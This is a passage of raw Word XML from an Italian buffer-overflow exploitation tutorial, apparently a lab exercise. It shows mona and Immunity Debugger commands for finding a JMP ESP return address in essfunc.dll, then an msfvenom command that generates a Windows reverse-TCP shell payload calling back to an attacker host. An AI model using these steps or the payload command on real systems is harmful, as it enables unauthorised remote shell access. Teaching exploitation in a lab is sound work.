      <w:r w:rsidRPr="009E2AE1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">!mona </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E2AE1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B0F3EA3" w14:textId="37D7397A" w:rsidR="009E2AE1" w:rsidRDefault="009E2AE1" w:rsidP="009E2AE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6954A1BC" wp14:editId="7F1A87C3">
            <wp:extent cx="6120130" cy="69342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37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="693420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4DE0D" w14:textId="36339DA1" w:rsidR="009E2AE1" w:rsidRDefault="009E2AE1" w:rsidP="009E2AE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E2AE1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Ciò che vediamo sono le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> librerie e moduli di cui il programma fa uso, ma a noi interessa prenderne uno che non abbia nessun tipo di protezione a livello di memoria, proprio come la riga selezionata in blu, quindi prenderemo il file </w:t>
      </w:r>
      <w:r w:rsidRPr="009E2AE1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>essfunc.dll</w:t>
      </w:r>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">. Adesso, piuttosto che utilizzare la funzione “JUMP ESP”, useremo il suo equivalente in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>OPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">. Usiamo quindi uno strumento di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> che generà l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>OPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> dall’Assembly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8C65A" w14:textId="3A5EF169" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="009E2AE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-framework/tools/exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nasm_shell.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="676015B8" w14:textId="766EF548" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="009E2AE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Questo ci aprirà un convertitore,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> ove, scrivendo il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> ci restituirà l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>OPCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>FFE4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4B482" w14:textId="1EBF025E" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715A5A55" wp14:editId="15E574D0">
            <wp:extent cx="4839119" cy="632515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4839119" cy="632515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975E6BA" w14:textId="77777777" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Adesso, tornando su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, sempre sulla console scriveremo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA8979" w14:textId="7B7B35BF" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">!mona </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s “\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00336633">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>\xe4” -m essfunc.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C9D92C" w14:textId="39334F3B" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Ovvero, stiamo dicendo di trovare la stringa all’interno del modulo vulnerabile scoperto prima. Ciò che troviamo è una lista di indirizzi di ritorno!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00734FD2" w14:textId="5583A4B3" w:rsidR="00336633" w:rsidRDefault="00336633" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68156513" wp14:editId="339AD254">
            <wp:extent cx="6120130" cy="861060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Immagine 20" descr="Immagine che contiene testo,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esto, elettronico&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="861060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36524C1B" w14:textId="1F726528" w:rsidR="00C665BE" w:rsidRDefault="00336633" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Creiamo quindi il file script5.py, scrivendo</w:t>
      </w:r>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> un’istruzione che ci farà saltare all’indirizzo “0x625011af”, che, però, sarà scritto al contrario, proprio perché stiamo trattando un “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>little-endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">” come scritto sopra! Usando l’icona della freccia blu su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">, scriviamo l’indirizzo appena trovato e ci porterà nell’istruzione assembly. A questo punto, mettendo un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> con F2, dando i permessi al file e lanciandolo, il programma andrà in pausa e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> ci avvertirà che abbiamo preso quell’istruzione. A questo punto siamo pronti per scrivere il codice malevolo che ci garantirà l’accesso alla shell del computer vittima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F7AEA" w14:textId="52C9876D" w:rsidR="008609E1" w:rsidRDefault="008609E1" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="008609E1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>script5.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27C8E3FD" w14:textId="77777777" w:rsidR="00C665BE" w:rsidRDefault="00C665BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33B38B" w14:textId="13684946" w:rsidR="00C665BE" w:rsidRPr="008C1448" w:rsidRDefault="00C665BE" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc76047773"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> e Root!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="22CFB861" w14:textId="504CFED3" w:rsidR="00C665BE" w:rsidRDefault="00C665BE" w:rsidP="00C665BE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizzeremo, quindi, l’ultimo strumento di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> per generare lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> necessario ad un “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>” verso il nostro computer. Il comando da utilizzare per generare questo codice è:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D8B55A" w14:textId="34C03B79" w:rsidR="00C665BE" w:rsidRDefault="00C665BE" w:rsidP="00C665BE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.0.0 LPORT=</w:t>
      </w:r>
      <w:r w:rsidR="006931A7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXITFUNC=thread -f c -a x86 -b "\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BD6B03" w14:textId="5041DBCA" w:rsidR="00792432" w:rsidRDefault="00C665BE" w:rsidP="00C665BE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C665BE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Attenzione! Questo codice va m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
